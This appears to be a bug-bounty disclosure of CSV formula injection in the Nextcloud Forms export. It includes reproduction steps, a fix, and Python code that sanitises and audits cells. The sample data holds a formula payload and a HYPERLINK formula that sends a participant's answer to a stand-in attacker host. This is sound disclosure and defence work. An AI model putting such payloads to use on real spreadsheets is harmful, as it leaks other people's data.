
Formula Injection vulnerability in CSV export feature

Medium
Nextcloud
Submitted None
Reported by 6661620a

Vulnerability Details

Technical details and impact analysis

Code Injection
**Dear Nextcloud Team –** I have identified a formula injection vulnerability [1][2] in the CSV export feature of the *Forms* app. I am aware that the Forms app is not part of this bug bounty program but was advised to disclose it via HackerOne anyway.

**Description.** When an Excel/Calc formula is sent as the answer to a question that uses one of the two *Response* answer types which support text input, the formula is reflected in the .csv export file without any sanitization. When the content of a cell starts with one of the following characters, the spreadsheet application treats the content as a formula:

- Equals ("=")
- Plus ("+")
- Minus ("-")
- At ("@")

**Risk.** A malicious actor who is in possession of a link to a Nextcloud Form can abuse this vulnerability to exfiltrate the other participants' answers from the same sheet, read local files or even execute code (in case the user who opens the document trusts the CSV file and dismisses the warning).

The following steps reproduce the vulnerability:

1. Create a new form that has either a *Short Response* or a *Long Response* field and save it.
2. Visit the link and submit `=1+1` as the answer.
3. Download the CSV and open it in either Excel or LibreOffice Calc. {F914621}

**Remediation.** Ensure that no cell starts with one of the operators listed above (+, -, @, =), which trigger formula parsing. If one of those characters has to be the first character of a cell, e.g. for a bullet-point list inside an answer, it can be escaped by prepending a single quote. The single quote is not shown in Excel or Calc but prevents the content from being parsed as a formula.
Cheers, Fabian

#### References

[1] https://owasp.org/www-community/attacks/CSV_Injection
[2] https://cwe.mitre.org/data/definitions/1236.html

## Impact

A malicious actor who is in possession of a link to a Nextcloud Form can abuse this vulnerability to

- exfiltrate the other participants' answers from the same sheet [1]
- read local files or execute code (in case the user who opens the document trusts the CSV file and dismisses the warning) [2]

[1] https://www.notsosecure.com/data-exfiltration-formula-injection/
[2] https://www.contextis.com/en/blog/comma-separated-vulnerabilities
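The behaviour described in the report and the remediation it proposes, as an added Python example (this is not Nextcloud Forms code and not the reporter's code): `vulnerable_export` writes answers to CSV verbatim, `hardened_export` prefixes any cell that begins with a formula trigger with a single quote, and `find_formula_cells` audits an exported file the way a tester would to confirm the fix. The sample answers, the `attacker.example` host and the tab/carriage-return triggers (taken from the cited OWASP page, not from the report itself) are constructed assumptions.

```python
import csv
import io

# Leading characters that make Excel and LibreOffice Calc parse a cell as a
# formula. "=", "+", "-" and "@" are the four the report lists; tab and
# carriage return are added from the cited OWASP page (assumption: the
# spreadsheet you care about honours them too).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export of a form with one Short Response question.
# "=1+1" is the report's reproduction payload; the HYPERLINK cell is a
# constructed instance of the exfiltration class the report cites, pointing
# at a hypothetical attacker host.
SAMPLE_ANSWERS = [
    ["Participant", "Short Response"],
    ["alice", "Works fine"],
    ["mallory", "=1+1"],
    ["bob", "- first point\n- second point"],
    ["eve", '=HYPERLINK("https://attacker.example/?"&A2,"click here")'],
]


def _write_csv(rows):
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerows(rows)
    return buf.getvalue()


def vulnerable_export(rows):
    """Reproduces the reported behaviour: answers are written verbatim,
    so "=1+1" lands in the file exactly as submitted."""
    return _write_csv(rows)


def neutralise_cell(value):
    """Apply the report's remediation: a leading single quote makes the
    spreadsheet keep the cell as text. Cells that do not start with a
    trigger are returned unchanged."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def hardened_export(rows):
    """Same export, with every cell neutralised before it is written."""
    return _write_csv([[neutralise_cell(cell) for cell in row] for row in rows])


def find_formula_cells(csv_text):
    """Audit an exported CSV: return (row, column, content) for every cell a
    spreadsheet would evaluate. An empty list means the export is clean."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    before = find_formula_cells(vulnerable_export(SAMPLE_ANSWERS))
    after = find_formula_cells(hardened_export(SAMPLE_ANSWERS))
    print(f"unsanitised export: {len(before)} formula cell(s) -> {before}")
    print(f"hardened export:    {len(after)} formula cell(s)")
```

The single quote is a real character in the file: anything that consumes the CSV programmatically rather than in a spreadsheet will see it, so apply the neutralisation only on the export path intended for spreadsheet users, and run the audit function against the downloaded file after the fix to confirm that `=1+1` and the bullet-list answer both come back as text.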

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Code Injection